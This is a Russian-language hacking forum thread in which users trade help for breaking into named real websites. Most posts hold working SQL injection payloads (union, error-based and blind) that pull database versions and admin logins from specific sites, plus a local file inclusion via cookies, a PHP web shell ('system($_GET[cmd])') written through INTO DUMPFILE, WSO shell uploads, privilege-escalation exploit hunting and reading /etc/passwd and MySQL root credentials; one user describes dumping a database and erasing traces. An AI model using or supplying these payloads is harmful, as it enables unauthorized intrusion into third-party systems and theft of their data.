В командную строку вводят не SQL, а Bash. Почитать можно на любом официальном сайте, любой заитересовавшей вас СУБД (Oracle,MySQL,PosgreSQL,MSSQL,DB2,Informix etc). Везде есть руководство по данным Базам данных. Ну и не забываем про изобилие книг в интернете!

Есть шелл, с определенными ограничениями:

Disabled PHP Functions: popen,exec,system,passthru,proc_open,shell_exec,ap ache_get_modules,apache_get_version,apache_getenv, apache_note,apache_setenv,disk_free_space,diskfree space,dl,highlight_file,ini_alter,ini_restore,open log,phpinfo,proc_nice,shell_exec,show_source,symli nk

Open base dir: /usr/local/www/site.ru/

Консоль в шелле не работает, встроенные в wso бинд/бэк не срабатывают.

Как еще можно организовать бэкконнект?

stan_q said:
Есть шелл, с определенными ограничениями:
Disabled PHP Functions: popen,exec,system,passthru,proc_open,shell_exec,ap ache_get_modules,apache_get_version,apache_getenv, apache_note,apache_setenv,disk_free_space,diskfree space,dl,highlight_file,ini_alter,ini_restore,open log,phpinfo,proc_nice,shell_exec,show_source,symli nk
Open base dir: /usr/local/www/site.ru/
Консоль в шелле не работает, встроенные в wso бинд/бэк не срабатывают.
Как еще можно организовать бэкконнект?


перл, питон, SSI

Konqi said:
перл, питон, SSI



SSI не работает, перла и питона нет в системе

усем упривед! нашел у ся на сайте такую заморочку.

page=1&catid=5 страница а), (набор товаров из определенной категории (catid=5))

при запросе page=1&catid=5` выдает ошибку, страница б).

при page=1&catid=5 order by 2 или больше выдает б).

при page=1&catid=5 order by 1 выдает страницу не а) и не б), а в)-(набор товаров но с разных категорий. раздел общих категорий у меня page=1&catid=0)

при page=1&catid=5-1 производит вычисление и выводит page=1&catid=4

sql inj не увлекаюсь, полазив по форумам нашел тока один стандарт и (union select 1.. или null) выдает а). есть ли еще способы проверки? а то вроде на лицо уязвимость а вроде и нет

Подскажите плз. Очень-очень нужно!


Code:
$str = "hello";
INSERT INTO table (str) VALUES ($str);

что нужно вписать в $str для того, например, чтобы в столбец str записалась версия БД(@@version)

$str = "@@version"; - не канает, записывается тупо строка, ну это и так понятно...

Вторую строку возможность изменить нет! Есть возможность ТОЛЬКО изменить значение переменной $str

cipa21, зависит от фильтрации $str.

VY_CMa said:
cipa21
, зависит от фильтрации $str.


если переменной присвоить одинарную ковычку, то БД на нее жалуется

to cipa21


$str = "(select @@version)";
INSERT INTO table (str) VALUES ($str);


Используйте подзапросы!

всё бы хорошо, но слово "VALUES" подкузьмило. В случае с INSERT ... SELECT его там не должно быть:

http://www.mysql.ru/docs/man/INSERT_SELECT.html

to drim

Внимательное читайте мануалы, а то выставляете себя не с хорошей стороны!


PHP:
mysql>insert into example(data)values((select@@version ));

Query OK,1 row affected(0.04 sec)

mysql>select*from example;

+------+------------+

|id|data|

+------+------------+

|NULL|5.5.24-log|

+------+------------+

2 rows in set(0.00 sec)

cat1vo said:
to
drim
Внимательное читайте мануалы, а то выставляете себя не с хорошей стороны!

PHP:
mysql>insert into example(data)values((select@@version ));

Query OK,1 row affected(0.04 sec)

mysql>select*from example;

+------+------------+

|id|data|

+------+------------+

|NULL|5.5.24-log|

+------+------------+

2 rows in set(0.00 sec)



а, ну ок)

действительно, в данном случае не используется конструкция INSERT ... SELECT. Это обычный INSERT ... VALUES, но с подзапросом

drim said:
а, ну ок)
действительно, в данном случае не используется конструкция INSERT ... SELECT. Это обычный INSERT ... VALUES, но с подзапросом


как я уже писал выше, нужно присвоить что-то переменной $str. Если так $str = "(select @@version)"; то в этом случае в БД запишется (select @@version) как обычная строка.

OxoTnik said:
Ну раз ШОП, то линк в студию)) (в личку кинь посотрю)


ОК раскроем карты http://biz.podolsk.ru/picturebrowse.php?catid=15

я не волшебник. я только учусь))) испробовал море всего уязвимость 100%

а застрял то в самом начале.

у?catid=15-7 производит вычисление catid=8

?catid=15 group by 1 вроде все норм ?catid=15 group by 2 уже облом выходит что 1? хм странно!? походу тут фильтрация union

вот тут собственно я заработал шизофрению!

моя проблема в том что я не могу догнать логику раскручивания фильтрации. прошу помощи и так сказать носом ткнуть.

apoclepsis said:
ОК раскроем карты http://biz.podolsk.ru/picturebrowse.php?catid=15
я не волшебник. я только учусь))) испробовал море всего уязвимость 100%
а застрял то в самом начале.
у?catid=15-7 производит вычисление catid=8
?catid=15 group by 1 вроде все норм ?catid=15 group by 2 уже облом выходит что 1? хм странно!? походу тут фильтрация union
вот тут собственно я заработал шизофрению!
моя проблема в том что я не могу догнать логику раскручивания фильтрации. прошу помощи и так сказать носом ткнуть.




Code:
http://biz.podolsk.ru/picturebrowse.php?catid=15+and+mid(version(),1,1)= 5--+-

Version: 5.1.60

-146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22

Вместо конструкции select+admin+from+admins можно подставить UPDATE запрос? А то что-то у меня не выходит?

cipa21 said:
-146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22
Вместо конструкции
select+admin+from+admins
можно подставить UPDATE запрос? А то что-то у меня не выходит?


нельзя

SELECT g.id FROM categories g LEFT JOIN msk.categories l ON g.id=l.id WHERE (g.spr_sel_super>0 OR l.sel_super>0) AND g.spr_visible=1 AND l.visible=1 ORDER BY IF(g.spr_sel_super>0, g.spr_sel_super, l.sel_super) DESC, RAND() LIMIT [SQL]

Как можно заюзать?

я всю голову сломал

Обычный union не берет вроде

В LIMIT Sql injection не раскрутите

cat1vo said:
В LIMIT Sql injection не раскрутите, если конечно уязвим не второй параметр.


В смысле второй?

я могу же и LIMIT 1 и LIMIT 1,1

Помогите советом.

Есть LFI но в параметре кукисов.

Логи не удалось найти, но можно подключать сессию.

Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет.

Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?

Teratex said:
Помогите советом.
Есть LFI но в параметре кукисов.
Логи не удалось найти, но можно подключать сессию.
Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет.
Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?


Для прочтение файлов php, попросту захексь их и всё. Дальше подключение найди к базе.

Teratex said:
Логи не удалось найти


/proc/self/environ - тоже не удалось найти?

VY_CMa

Не читает, уже все возможные комбинации пробивал и логов и конфигов, нашел только настройки апача, в них указан путь логов, но почему-то не читает по этому пути, это загадка конечно почему.

Zed0x

Как именно это должно выглядеть?

Пробовал так же:

php://filter/convert.base64-encode/resource=/home/httpd/html/site.com/public_html/index.php

Но так же не срабатывает, по каким именно причинам не знаю.

Срабатывают инклюды только с %00

Возможно это как-то связано именно с параметром куки? или разницы нет, что это переменная в урле, что куки?

Если так

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F var%2Fwww%2Fhtml%2Fsite.com%2Findex%2Ephp%00

То так тоже выдает уже выполненный php

Teratex said:
Если так
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F var%2Fwww%2Fhtml%2Fsite.com%2Findex%2Ephp%00
То так тоже выдает уже выполненный php


выдает уже выполненный php, наверное потому что у тебя инклюд а не читалка.

к логам и енвирону вполне вероятно нету прав на чтение.

ищи то на что есть права

Expl0ited

Да уже перепробовал все, вот только сессия доступна и FD но в них что-то никак немогу найти то что нужно в логах, они с запозданием туда попадают и почему-то разные извращения с не заносятся.

Но вышло проще, форма заполнения профиля не фильтруется нифига, потому если вставить в имя например и потом проинклюдить сессию, то видно результат выполнения phpinfo()

Теперь я так понимаю мне нужно методом copy залить шелл в tmp, верно? а потом проинклюдить и нормально его разместить в системе....потому как не знаю какие права на запись есть у каких папок

Teratex said:
Expl0ited
Да уже перепробовал все, вот только сессия доступна и FD но в них что-то никак немогу найти то что нужно в логах, они с запозданием туда попадают и почему-то разные извращения с не заносятся.
Но вышло проще, форма заполнения профиля не фильтруется нифига, потому если вставить в имя например и потом проинклюдить сессию, то видно результат выполнения phpinfo()
Теперь я так понимаю мне нужно методом copy залить шелл в tmp, верно? а потом проинклюдить и нормально его разместить в системе....потому как не знаю какие права на запись есть у каких папок



потом из кук инклюдишь /tmp/shell.txt

ищешь диру и ты молодец.

а вообще молодец, сам задал вопрос - сам ответил )

побольше бы таких

Теперь другая проблема, шелл то заинклюдил в куки, но везде все надписи сереневым цветом.

User: 48 ( apache ) Group: 48 ( apache )

Cwd: u---------

С таким развитием событий не сталкивался еще, директории никакие не видны, все на запись запрещено, как дальше двигаться?

Хотя читать через и передвигаться вручную с помощью ChangeDir и ReadFile можно, но почему не работает шел в нормальном режиме...

Видимо у Вас Safe_mod, да и права говорят сами за за себя! Попробуй прочитать все возможные папки на чтение, бывали варианты, что можно прочитать соседа, а то и залиться к нему! Пробуйте, в общем!

cat1vo

Заливался в разные папки, но все равно так же.

сейф моуд стоит off

Ну да ладно, и руками справился, нашел конфиги вручную, подключился базе, слил в доступную папку и скачал через сам сайт, ибо из шела даже скачать файлы нельзя, ну и потом же таким геморройным путем удалил дампы, через форму и инклюд)

Такой вопрос

PHP хранит свои сессии в известных папках, tmp и.т.д

А где хранятся сессии JSESSIONID, если стоит ява и Apache Tomcat?

помогите залить шелл в вордпресс, плагины и теми защищены от записи,

WordPress 2.0.7

pirat0

А заливать каким путем собираешься? через админку или есть локальный инклюд?

Помогите раскрутить

Пробывал sqlmap'ом.

http://www.fanatnauki.ru/index.php?option=com_fireboard&Itemid=8&func=view

"]
[ Dumi ] said:
Не получается


http://www.fanatnauki.ru/index.php

?option=com_fireboard

&Itemid=8

&func=view

&task=showprf',(extractvalue(1,concat(0x3a,version( )))),1,2,3,4)-- xyi

upd. главное после --ПРОБЕЛ надо какой-то ещё символ поставить, а то trim убирает пробел

Ups

Плохо значит пробовал, мапом нужно научиться пользоваться, это не HAvij, но куда более мощный и гибкий.


option=com_fireboard&Itemid=8&func=view&task=showprf' AND (SELECT 4499 FROM(SELECT COUNT(*),CONCAT(0x3a7871773a,(SELECT (CASE WHEN (4499=4499) THEN 1 ELSE 0 END)),0x3a7361703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dEci'='dEci


current user: 'kubrikov_fn@localhost'


database management system users privileges:
kubrikov_fn'@'localhost
privilege: USAGE
available databases
information_schema
kubrikov_fn

Teratex said:
Ups
Плохо значит пробовал, мапом нужно научиться пользоваться, это не HAvij, но куда более мощный и гибкий.
current user: 'kubrikov_fn@localhost'


Он не знал, что скуль в другом параметре - task.

Зы. смысл было повторно постить раскрутку ещё и более длинным способом...

Melfis said:
Зы. смысл было повторно постить раскрутку ещё и более длинным способом...


Дайте покороче способ, если есть. Спасибо.

Ups said:
Дайте покороче способ, если есть.
Спасибо.


/showpost.php?p=3243868&postcount=21172

Выше разве не он?

Ups

Я дал ему способ для мапа и как пример показал что можно и мапом, а что использовать дело хозяйское, вот для того и запостил.

Teratex said:
pirat0
А заливать каким путем собираешься? через админку или есть локальный инклюд?


через админку

Здравствуйте, подскажите, пожалуйста, что делать, если order by никогда не выдает ошибку?

Например, здесь: http://dynatone.ru/products.php?brand=Flight&group=911'

Nightfall said:
Здравствуйте, подскажите, пожалуйста, что делать, если order by никогда не выдает ошибку?
Например, здесь: http://dynatone.ru/products.php?brand=Flight&group=911'


Там по моему фильтр на union select

но order by же должен работать?

Nightfall said:
Здравствуйте, подскажите, пожалуйста, что делать, если order by никогда не выдает ошибку?
Например, здесь: http://dynatone.ru/products.php?brand=Flight&group=911'




http://dynatone.ru/products.php?brand=Flight&group=911'or(select*from(select(name_const(version (),1)),name_const(version(),1))a)and(1)='1




'5.1.61'

OxoTnik said:


'5.1.61'


Через name_const не выведешь ничего кроме version()

Вот запрос более рабочий с примером работы с таблицами и колонками.


http://dynatone.ru/products.php?brand=Flight&group=911'or(1)group/**/by(mid((select(column_name)from(information_schema .columns)where(table_schema='dntMainBase'and(table _name='managers'))limit/**/0,1),rand(0)|0,64))having(sum(0)-1)or'1'='1#

Всем большое спасибо за помощь

http://www.rosalcohol.ru/site.php?id=8295&table=bmV3c19nbGF2

уязвим параметр id

почему не работает юнион селект?

колонки подбираются,дальше не хочет

версия мускля думаю поэтому и не хочет

там 3 версия?

InDuStRieS said:
http://www.rosalcohol.ru/site.php?id=8295&table=bmV3c19nbGF2
уязвим параметр id
почему не работает юнион селект?
колонки подбираются,дальше не хочет
версия мускля поэтому и не хочет
там 3 версия?


Всё отлично работает


http://www.rosalcohol.ru/site.php?id=-8295+union+select+1,2,3,version%28%29,5,6,7&table=bmV3c19nbGF2


4.0.27-log

OxoTnik said:
Всё отлично работает
4.0.27-log


блин точно,забыл минусик поставить...ппц я протупил

спасибо

http://www.intim.dn.ua/catalog/vender.php?id=412'+order+by+10&meta_id=1790

Почему тут не работает?

Не выводит

InDuStRieS said:
http://www.intim.dn.ua/catalog/vender.php?id=412'+order+by+10&meta_id=1790
Почему тут не работает?
Не выводит


Потому-что это слепая скуля

MaxFast said:
Потому-что это слепая скуля


Вы не правы

InDuStRieS said:
http://www.intim.dn.ua/catalog/vender.php?id=412'+order+by+10&meta_id=1790
Почему тут не работает?
Не выводит


блиндом выводится

5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu

er9j6@ said:
блиндом выводится
5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu


Не со всем понятно,там же мускл ошибка выводиться..

В любом случае чтобы тут не флудить,просьба отписать в личку или в аську 564714

Готов финансово вознаградить,нужно обьяснить как ты вывел

Подскажите актуальные методы trace

Dad69 said:
Подскажите актуальные методы trace


Эмм. Что ? Очередная порция хеккеров с Acunetix ?

Описание. Пункт 9.8 (http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html)

Применение в XSS (http://www.inattack.ru/article/kurs-molodogo-bojtsa-10-metodyi-osusches/516.html)

Dad69

Этот метод тебе ничего не даст, потому что сложно заставить браузер жертвы отослать запрос TRACE, он используется если в двух словах просто для отражения запроса обратно к клиенту, т.е. теоретически если бы ты смог заставить жертву отослать такой запрос, сервер вернул бы эту информацию назад, например куки жертвы.

Но не знаю на сегодняшний день позволяет ли хоть один браузер такое делать. Вот если бы там был рабочий метод PUT ))

Собственно BigBear дал ссылки на описание.

Подскажите, плиз, подобрал колонки, хочу вывести логин и пасс админа, но не получается.

Для таблиц


http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,table_name,3%20from%20informati on_schema.tables%20limit%2044,1%20--


Для колонок


http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,group_concat%28column_name%29,3 +from+information_schema.columns+where+table_name= 0x75736572--


Для вывода админа


www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws(username,password),3 from+user+limit+1,1 --


Почему данные админа не выводятся?

sobvit said:
Почему данные админа не выводятся?




http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws%280x3a,username,passw ord%29,3%20from+crt_main.user+limit+0,1--


.....

OxoTnik said:
.....


А почему надо использовать такую конструкцию записи (crt_main.user) ?

sobvit said:
А почему надо использовать такую конструкцию записи (crt_main.user) ?


потому что таблица в другой базе, читайте учебники , дальше буду удалять

Пытаюсь залить шелл в vBulletin 3.1.0 с помощью XML шелла.

Тут при загрузке происходит ошибка "XML Error: Reserved XML Name at Line 1".

В чем проблема?

пробел перед началом текста XML убери

помогите плз

есть уязвимый пхп скрипт(sql inj)

3 столбца

id=x

структура запросса:

SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id

соответственно на эту часть запроса я повлиять не могу:

and emb_gallery=gallery_id

При запросе:

id=9999+union+select+1,2,3--

ошибка:

SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed

КАК ПРАВИЛЬНО СОСТАВИТЬ ЗАПРОС?

запросы не одинаковые.

отсечь правую часть не получается? все варианты попробовал (//, /**/, +--) ?

to blesse

У Вас уязвимый параметр используется в двух запросах! Используйте Error-based методы вывода!

cat1vo said:
to
blesse
У Вас уязвимый параметр используется в двух запросах! Используйте Error-based методы вывода!


не знаком с этим можно мануальчик ?

blesse said:
не знаком с этим можно мануальчик ?


миллионы страниц (http://lmgtfy.com/?q=sql+error+based) на эту тему

http://2druga.com/news.php?page=0

Есть ли тут скуля? При подстановки кавычки выбивает ошибку.

Дико извеняюсь не заметил вывод в название страницы (на вкладке еденичка очень сливалась с названием)

теперь след вопрос :

9999+union+select+'текст шелла',null,null+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

так я зальюсь?если file_priv=Y

Export said:
http://2druga.com/news.php?page=0
Есть ли тут скуля? При подстановки кавычки выбивает ошибку.


Да скуль есть,но имхо этот сайт не стоит того чтобы ее раскручивать.

Залил shell wso на форум.Теперь хочу получить root права.По не могу разобраться как залить exploit.Подскажите пожалуйста.

Uname: Linux emn55 2.6.26-2-amd64

Експлоит для него

http://www.exploit-db.com/search/?action=search&filter_description=Linux+2.6

Искал долго в поисковике но подробно ничего нету.Спасибо.

2.6.x пробуй (http://th3-0utl4ws.com/localroot/)

MaxFast я немогу разобраться,как залить експлоит и запустить.

помогите составить запрос заливки файла(имею file_priv=Y)

есть уязвимый пхп скрипт(sql inj)

id=x

структура запросса:

SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id

При запросе:

id=9999+union+select+1,2,3--

ошибка:

SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed

вывод в 1 столбец

пишу

9999+union+select+'%3C?php%20system($_GET[%22cmd%22]);%20?%3E',null,null+into+DUMPFILE+'/полный/путь/до/моего/файла/х/test.php'/*-- файл не создается

Как правильно составить запрос?

blesse said:
помогите составить запрос заливки файла(имею file_priv=Y)
есть уязвимый пхп скрипт(sql inj)
id=x
структура запросса:
SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id
При запросе:
id=9999+union+select+1,2,3--
ошибка:
SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed
вывод в 1 столбец
пишу
9999+union+select+'%3C?php%20system($_GET[%22cmd%22]);%20?%3E',null,null+into+DUMPFILE+'/полный/путь/до/моего/файла/х/test.php'/*-- файл не создается
Как правильно составить запрос?


может кавычки фильтруются?

у меня так работало вроде:


PHP:
select '' into outfile '/home/cdut/domains/sss/htdocs/phpmyadmin/1.php'

раскрутил double blind inj на 1 сайтике, сбрутил имена всех доступных баз данных, среди них есть и mysql. file_priv соответственно тоже есть. Пути никакие вообще не знаю, локального инклюда нету, скан портов на предмет сервака баз данных ничего хорошего не сказал.

Что сделать можно, кроме как брутить путь к конфигурационным файлам апача? А то что-то нет никакого желания брутить строки через двойную слепоту...

UP

ковычки не фильтруются

9999+union+select+null,'text',null+into+outfile+'/х/х/х/х/х/х/1.php'/*

файл не записывается и вылазит ошибка

QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 union select null,'text',null into outfile '/х/х/х/х/х/х/1.php'/* and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!

Запрос:

9999+select+''+into+outfile+'/х/х/х/х/х/х/1.php'--+

Тоже файл не записывается и ошибка:

QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 select '' into outfile '/х/х/х/х/х/х/1.php'-- and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!

blesse said:
UP
ковычки не фильтруются
9999+union+select+null,'text',null+into+outfile+'/х/х/х/х/х/х/1.php'/*
файл не записывается и вылазит ошибка
QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 union select null,'text',null into outfile '/х/х/х/х/х/х/1.php'/* and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!
Запрос:
9999+select+''+into+outfile+'/х/х/х/х/х/х/1.php'--+
Тоже файл не записывается и ошибка:
QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 select '' into outfile '/х/х/х/х/х/х/1.php'-- and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!


magic qoutes may be?

'asd' просто отображает?

antiaudomain said:
magic qoutes may be?
'asd' просто отображает?


запрос

9999+union+select+'1',2,3--+

выводит в столбец просто 1

думаю ,что mq=off т.к.

запрос 9999+union+select+LOAD_FILE('/etc/passwd'),2,3--+ выполняется успешно и выводится этот файл.

Я вот подумал может нету прав у юзера на котором мускул запушен на запись в диру которую я ему подсовываю?как это можно провирить проверить?и как действовать в таком случае?

ЧТО Я ИМЕЮ:

1.Доступ ко всем бд серва(там есть Пхпадмин и таблица psa-похоже ,что это типо cpanel ,но адрес их адреса найти не удалось ровно также как и определить хостинг сайта)

2.Соответственно могу читать файлы.

3.На борту есть форум пхпбб, но в его дб не удалось обнаружить таблиц с юзерами(видать кудато в другое место пишутся)пытался прочитать скрипт реги ,но куда пишутся юзеры так и не обнаружил.

"blesse" в пхпбб есть директории на которые по умолчанию права 777, что то вроде папки для аватаров и т.д. пробуй залиться туда.

VY_CMa said:
"blesse" в пхпбб есть директории на которые по умолчанию права 777, что то вроде папки для аватаров и т.д. пробуй залиться туда.


Да ,но в них как правило запрет на исполнение пхп скриптов

А такую уязвимость вообще реально раскрутить? https://p-on.ru/admin/

и

http://www.alarmtrade.ru/search/?search=UNION+SELECT+ids+FROM+pages+WHER'

Хотелось бы знать как.

по поводу p-on.ru:

в поле логин: ' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))#)

message: Duplicate entry '5.0.45-community-nt' for key 1

по поводу: alarmtrade.ru:


Code:
http://www.alarmtrade.ru/search/?search='or(1)group/**/by(concat(version(),0x00,floor(rand(0)*2)))having( min(0)or(1))--+

Duplicate entry '5.1.58' for key 'group_key'

Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом.

И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404

UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?

WendM said:
Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом.
И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404
UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?


Юзать root. Прокачай систему до 20 левела с помощью сплоита.

VY_CMa said:
Юзать root. Прокачай систему до 20 левела с помощью сплоита.


?? Можно подробней

VY_CMa said:
Юзать root. Прокачай систему до 20 левела с помощью сплоита.


вообще-то самый высокий уровень нулевой, а никак не 20

по сабжу, пароль от мюскл можно узнать в трех случаях:

имея рута на сервере и как правило пароль лежит тут: /root/.my.cnf

имея логин и пароль пользователя который не ограничен доступом в mysql.user, достал хеш рута => брут => профит

найти пароль в конфигах, логах, процессах

WendM

Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую.

НО нужно еще пасс расшифровать.

Или как писали если есть возможность заюзать сплоит и повысить права

Teratex said:
WendM
Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую.




WendM said:
Нашел папку mysql, но зайти в нее не дает,

Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки